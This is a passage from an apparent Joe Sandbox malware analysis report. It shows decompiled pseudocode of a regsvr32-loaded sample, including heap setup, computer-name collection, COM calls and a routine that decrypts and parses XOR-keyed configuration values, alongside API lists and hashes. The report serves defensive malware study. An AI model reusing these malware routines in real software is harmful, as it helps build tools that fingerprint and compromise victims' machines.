                    0x04f96088
                    0x04f96095
                    0x04f96098
                    0x04f9609b
                    0x04f960a2
                    0x04f960a5
                    0x04f960b3
                    0x04f960b8
                    0x04f960bd
                    0x04f960c2
                    0x04f960c4
                    0x04f960cc
                    0x04f960cc
                    0x04f960db
                    0x04f960f0
                    0x04f960f7
                    0x04f960fe
                    0x04f96104
                    0x04f96112
                    0x04f96118
                    0x04f9611b
                    0x04f96128
                    0x04f9612d
                    0x04f96131
                    0x04f96131
                    0x04f960f7
                    0x04f9613c
                    0x04f96147
                    0x04f96147
                    0x04f96153

                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04F94DD9,?,04F93AC6,04F93AC6,?), ref: 04F960B3
                    • memset.NTDLL ref: 04F96128
                    • memset.NTDLL ref: 04F9613C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 8e95fbccf12db9527729c8def768fbdb19c2e705ea15e7163666c1794ffd2be7
                    • Instruction ID: 8c27728d83601d40bac3f7776de426dede58848e4ff28a75e2a71071fc687ab3
                    • Opcode Fuzzy Hash: 8e95fbccf12db9527729c8def768fbdb19c2e705ea15e7163666c1794ffd2be7
                    • Instruction Fuzzy Hash: 36215A71E00219ABFF11AF65CD40FAEBBF8AF08644F044025E904E6251E735AE428BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95F80 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04F95F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04F914E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4f9a320; // 0xb2d5a8
						_t20 = _t68 + 0x4f9b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04F963B0(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                    0x04f95f86
                    0x04f95f89
                    0x04f95f99
                    0x04f95fa2
                    0x04f95fa6
                    0x04f96074
                    0x04f9607a
                    0x04f9607a
                    0x04f95fc0
                    0x04f95fc5
                    0x04f95fc9
                    0x04f95fcf
                    0x04f95fd4
                    0x04f95fdb
                    0x04f95fea
                    0x04f95fea
                    0x04f95fee
                    0x04f95ff0
                    0x04f95ffc
                    0x04f96007
                    0x04f96012
                    0x04f96016
                    0x04f96020
                    0x04f96024
                    0x04f96026
                    0x04f9602b
                    0x04f96032
                    0x04f96042
                    0x04f96042
                    0x04f9602b
                    0x04f96024
                    0x04f96044
                    0x04f96049
                    0x04f9604e
                    0x04f9604e
                    0x04f96054
                    0x04f9605a
                    0x04f9605f
                    0x04f9605f
                    0x04f96064
                    0x04f96069
                    0x04f96069
                    0x04f96064
                    0x04f95fee
                    0x04f9606b
                    0x04f96071
                    0x00000000

                    APIs
                      • Part of subcall function 04F914E4: SysAllocString.OLEAUT32(80000002), ref: 04F9153B
                      • Part of subcall function 04F914E4: SysFreeString.OLEAUT32(00000000), ref: 04F915A0
                    • SysFreeString.OLEAUT32(?), ref: 04F9605F
                    • SysFreeString.OLEAUT32(04F92BCC), ref: 04F96069
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: de2688cd3dfdb08e7f16c4db9395f9e8ec0d3eed14573ad560722a16ccbf0a2a
                    • Instruction ID: 36fd7f64eab23a1ba94992b4613aa31b46acccf9e5661415b913bfac4f65ce85
                    • Opcode Fuzzy Hash: de2688cd3dfdb08e7f16c4db9395f9e8ec0d3eed14573ad560722a16ccbf0a2a
                    • Instruction Fuzzy Hash: D0312772900159BFEF21DF69CC88C9BBBB9FBC97407144658F9059B220D732AD52CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F92985 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F92985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E04F91BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x4f9a2d8, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E04F93CEA(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                    0x04f92985
                    0x04f9298d
                    0x04f929a4
                    0x04f929bf
                    0x04f929c3
                    0x04f929c8
                    0x04f929ca
                    0x04f929da
                    0x04f929e6
                    0x04f929cc
                    0x04f929cc
                    0x04f929cf
                    0x04f929d4
                    0x04f929d4
                    0x04f929ca
                    0x04f929ec
                    0x04f929f0
                    0x04f929f0
                    0x04f92999
                    0x04f9299e
                    0x04f929a2
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 04F93CEA: SysFreeString.OLEAUT32(00000000), ref: 04F93D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04F933D6,?,004F0053,05AC93D8,00000000,?), ref: 04F929E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: b0b28d20f13b74ea781403e7f3b8d3d80693da8b9bddb455d507b040724005b2
                    • Instruction ID: 2d1551ca1833e2396b9cb5d2fe99061f120e09aff5924fbe7e78da69fc110a9b
                    • Opcode Fuzzy Hash: b0b28d20f13b74ea781403e7f3b8d3d80693da8b9bddb455d507b040724005b2
                    • Instruction Fuzzy Hash: 0901FB32500619BBEF229F44EC41FEA7BA9FB04790F058469FE155A120D731ED61EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9256F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E04F9256F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04F963FD(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04F917AB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                    0x04f92574
                    0x04f9257f
                    0x04f92581
                    0x04f92587
                    0x04f92589
                    0x04f9258e
                    0x04f92597
                    0x04f9259b
                    0x04f925a4
                    0x04f925a8
                    0x04f925b7
                    0x04f925aa
                    0x04f925ab
                    0x04f925b0
                    0x04f925b0
                    0x04f925a8
                    0x04f9259b
                    0x04f925c0

                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04F96999), ref: 04F92587
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04F96999), ref: 04F925A4
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 28f8c0acd7bdc24a731b09930fb1c8b36ab4c7d8741d808aa998857228fbb514
                    • Instruction ID: 2df3841987fb3d512ce299685de8b733072d055670d2649dfbecc3fa4070bbbe
                    • Opcode Fuzzy Hash: 28f8c0acd7bdc24a731b09930fb1c8b36ab4c7d8741d808aa998857228fbb514
                    • Instruction Fuzzy Hash: C6F05E76A0010ABAFF11D6AA8D14EAF77FCDBC5654F1200A9E904D3240EAB0EE039670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F945D2 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F945D2(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4f9a2d8 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x4f9a1c8 = GetTickCount();
				_t5 = E04F95A5A(_a4);
				if(_t5 == 0) {
					E04F92A4C(_t10, _a4); // executed
					if(E04F94C43(_t10) != 0) {
						 *0x4f9a300 = 1; // executed
					}
					_t8 = E04F96535(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                    0x04f945d2
                    0x04f945db
                    0x04f945e3
                    0x04f945e8
                    0x04f945ec
                    0x00000000
                    0x04f945ec
                    0x04f945f9
                    0x04f945fe
                    0x04f94605
                    0x04f9460b
                    0x04f94617
                    0x04f94619
                    0x04f94619
                    0x04f94623
                    0x00000000
                    0x04f94623
                    0x04f94628

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,04F9108E,?), ref: 04F945DB
                    • GetTickCount.KERNEL32 ref: 04F945EF
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 9e0309291da46ed3d38d4eb13d025e36e81baf9e06b3736c3110cd4f9445283e
                    • Instruction ID: d7446e9413a9798757b509dae288913d3a6c86b9c67cae08f50e05a22614d4ff
                    • Opcode Fuzzy Hash: 9e0309291da46ed3d38d4eb13d025e36e81baf9e06b3736c3110cd4f9445283e
                    • Instruction Fuzzy Hash: 25E06DB1A48204BAFF706F70BD45B0976E4EB6470AF114419E504C11A0DFB9AC439A26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93CEA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E04F93CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4f9a320; // 0xb2d5a8
				_t4 = _t15 + 0x4f9b39c; // 0x5ac8944
				_t20 = _t4;
				_t6 = _t15 + 0x4f9b124; // 0x650047
				_t17 = E04F95F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04F92E8A(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                    0x04f93cf4
                    0x04f93cf6
                    0x04f93cfd
                    0x04f93cfe
                    0x04f93cff
                    0x04f93d00
                    0x04f93d06
                    0x04f93d0b
                    0x04f93d0b
                    0x04f93d15
                    0x04f93d27
                    0x04f93d2e
                    0x04f93d5d
                    0x04f93d30
                    0x04f93d35
                    0x04f93d5a
                    0x04f93d37
                    0x04f93d3a
                    0x04f93d41
                    0x04f93d4c
                    0x04f93d43
                    0x04f93d46
                    0x04f93d46
                    0x04f93d50
                    0x04f93d50
                    0x04f93d35
                    0x04f93d64

                    APIs
                      • Part of subcall function 04F95F80: SysFreeString.OLEAUT32(?), ref: 04F9605F
                      • Part of subcall function 04F92E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04F925F5,004F0053,00000000,?), ref: 04F92E93
                      • Part of subcall function 04F92E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04F925F5,004F0053,00000000,?), ref: 04F92EBD
                      • Part of subcall function 04F92E8A: memset.NTDLL ref: 04F92ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04F93D50
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: 1aa36b2c24291403553b31dd48271d20b9cbb1845d7082b6ca1608b9f177e17a
                    • Instruction ID: 0ce5744686352df9414aedac3283249559fe50b65b8398083a91523fdae9107a
                    • Opcode Fuzzy Hash: 1aa36b2c24291403553b31dd48271d20b9cbb1845d7082b6ca1608b9f177e17a
                    • Instruction Fuzzy Hash: A0018C3260012DBBEF11AFA4DC04DAEBBB8FB48610F054416EE05E6164E3B1AD168B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F956CF Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E04F956CF(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                    0x04f956cf
                    0x04f956dc
                    0x04f956dd
                    0x04f956de
                    0x04f956e5
                    0x04f95713
                    0x04f95714
                    0x04f95717
                    0x04f9571d
                    0x00000000
                    0x00000000
                    0x04f956fc
                    0x04f95706
                    0x04f9570d
                    0x00000000
                    0x04f956fe
                    0x04f95701
                    0x04f95721
                    0x04f95703
                    0x04f95703
                    0x00000000
                    0x04f95703
                    0x04f95701
                    0x04f95728
                    0x04f9572e
                    0x04f9572e
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 8d5ffc6eef76f5ed1f3c6f77fe9d4d1e317d28fcf5c02fbcfd08b596adb2048b
                    • Instruction ID: 58da94db78e879a961d6267d1dfb6d976f489c581e19ee81398b8148610ac272
                    • Opcode Fuzzy Hash: 8d5ffc6eef76f5ed1f3c6f77fe9d4d1e317d28fcf5c02fbcfd08b596adb2048b
                    • Instruction Fuzzy Hash: E3F0F676D01218FBDF11DBA4D488AEDB7B8EF04244F1090AAE502A3200D2B46B85CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F97885 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04F97885(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04F94872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04F963FD(_a8 + _a8);
					if(_t21 != 0) {
						E04F9213D(_a4, _t21, _t23);
					}
					E04F917AB(_a4);
				}
				return _t21;
			}





                    0x04f9788d
                    0x04f97894
                    0x04f97896
                    0x04f978a5
                    0x04f978ac
                    0x04f978bb
                    0x04f978bf
                    0x04f978c6
                    0x04f978c6
                    0x04f978ce
                    0x04f978d3
                    0x04f978d8

                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,04F9191E,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F97896
                      • Part of subcall function 04F94872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04F93AC6), ref: 04F948AA
                      • Part of subcall function 04F94872: memcpy.NTDLL(?,04F93AC6,00000010,?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9), ref: 04F948C3
                      • Part of subcall function 04F94872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04F948EC
                      • Part of subcall function 04F94872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04F94904
                      • Part of subcall function 04F94872: memcpy.NTDLL(00000000,04F94DD9,04F93AC6,0000011F), ref: 04F94956
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: b0bd42f836d04e884b37b197c957ffb1fddfc528b0eca6d552a35ef55a07ef81
                    • Instruction ID: 34adee226314dd60868647144c07e66694b07e8039b20cf1748d22cfb0187672
                    • Opcode Fuzzy Hash: b0bd42f836d04e884b37b197c957ffb1fddfc528b0eca6d552a35ef55a07ef81
                    • Instruction Fuzzy Hash: FEF03A76100109BAFF016E55DC40CEA3BEDEF84264B018022FD18DA110EA31EE569BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F94DC8 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F94DC8(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E04F9607D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E04F917AB(_a4);
				}
				return _t12;
			}





                    0x04f94dd4
                    0x04f94dd9
                    0x04f94ddd
                    0x04f94de4
                    0x04f94def
                    0x04f94df3
                    0x04f94df3
                    0x04f94dfc

                    APIs
                      • Part of subcall function 04F9607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04F94DD9,?,04F93AC6,04F93AC6,?), ref: 04F960B3
                      • Part of subcall function 04F9607D: memset.NTDLL ref: 04F96128
                      • Part of subcall function 04F9607D: memset.NTDLL ref: 04F9613C
                    • memcpy.NTDLL(?,04F93AC6,00000000,?,04F93AC6,04F93AC6,?,?,04F93AC6,?), ref: 04F94DE4
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: 246eba5bfa70c740e6c56f9d342ee6f9ebeb68fd9243f1d10129efe8d18bbcc0
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: 78E08C3690012A77FF122A94DC40EEF7FACCF51691F044061FE088A210E622EE1293E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 04F94EF3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E04F94EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x4f9a31c; // 0x69b25f44
				if(E04F94451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x4f9a374 = _v8;
				}
				_t33 =  *0x4f9a31c; // 0x69b25f44
				if(E04F94451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4f9a31c; // 0x69b25f44
				_push(_t115);
				if(E04F94451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4f9a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4f9a31c; // 0x69b25f44
						_t45 = E04F9572F(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4f9a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4f9a31c; // 0x69b25f44
						_t46 = E04F9572F(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4f9a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4f9a31c; // 0x69b25f44
						_t47 = E04F9572F(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4f9a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4f9a31c; // 0x69b25f44
						_t48 = E04F9572F(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4f9a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4f9a31c; // 0x69b25f44
